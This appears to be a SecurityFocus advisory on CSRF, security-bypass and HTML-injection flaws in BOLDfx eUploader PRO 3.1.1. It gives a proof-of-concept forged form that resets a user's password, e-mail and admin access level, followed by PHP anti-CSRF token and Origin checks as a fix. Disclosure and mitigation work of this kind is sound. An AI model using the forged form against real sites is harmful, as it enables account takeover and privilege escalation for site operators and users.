source: http://www.securityfocus.com/bid/41783/info

BOLDfx eUploader is prone to multiple remote vulnerabilities, including a cross-site request forgery vulnerability, a security-bypass vulnerability, and an HTML-injection vulnerability.

Attacker-supplied HTML and script code could run in the context of the affected site, potentially allowing an attacker to steal cookie-based authentication credentials and to control how the site is rendered to the user. A remote attacker may also be able to perform certain administrative actions without proper authentication; other attacks are also possible.

eUploader PRO 3.1.1 is vulnerable; other versions may also be affected.

Proof of concept (a forged form that, when submitted by a logged-in administrator, changes the password, e-mail address and access level of the user identified by [ID]):

<form action="http://www.example.com/admin.php?page=user&id=[ID]" method="post">
  <input type="hidden" name="id" value="[ID]">
  <input type="hidden" name="admin_access" value="2">
  <input type="hidden" name="email" value="my@email.com">
  <input type="hidden" name="pass" value="hacked">
  <input type="hidden" name="pass2" value="hacked">
  <input type="submit" name="edit" value="Submit">
</form>
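The forgery above works because the user-edit handler accepts any POST that arrives with the victim's session cookie. The following PHP is an added example of the server-side check that defeats it; it is not eUploader's code, and the function names, the csrf_token form field and the assumption that admin.php handles the request when $_POST['edit'] is set are illustrative.

```php
<?php
// Added example (not eUploader code): anti-CSRF guard for an admin form
// handler such as admin.php?page=user. Function and field names are assumptions.
session_start();

// One unpredictable token per session; embed it in every state-changing form.
function csrf_token(): string {
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// True only when the POST carries the session's token (compared in constant time)
// and, if the browser sent an Origin header, that Origin names this host.
// A form hosted on another site cannot read the token and sends a foreign Origin,
// so the forged request from the proof of concept fails both checks.
function request_is_same_origin(array $post, array $server, string $expected_host): bool {
    $expected = $_SESSION['csrf_token'] ?? '';
    $supplied = $post['csrf_token'] ?? '';
    if ($expected === '' || !is_string($supplied) || !hash_equals($expected, $supplied)) {
        return false;
    }
    if (isset($server['HTTP_ORIGIN'])) {
        $origin_host = parse_url($server['HTTP_ORIGIN'], PHP_URL_HOST);
        if (!is_string($origin_host) || strcasecmp($origin_host, $expected_host) !== 0) {
            return false;
        }
    }
    return true;
}

if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['edit'])) {
    if (!request_is_same_origin($_POST, $_SERVER, $_SERVER['SERVER_NAME'])) {
        http_response_code(403);
        exit('Rejected: request did not originate from this site.');
    }
    // Only past this point should admin_access, email, pass and pass2 be applied.
    // For password and privilege changes, additionally require the current
    // password to be re-entered so a stolen session alone is not enough.
}
?>
<!-- Hidden field to add inside the legitimate user-edit form -->
<input type="hidden" name="csrf_token"
       value="<?= htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8') ?>">
```

Setting the session cookie with the SameSite attribute (Lax or Strict) adds a second, browser-enforced layer, but the token check remains the one the application controls.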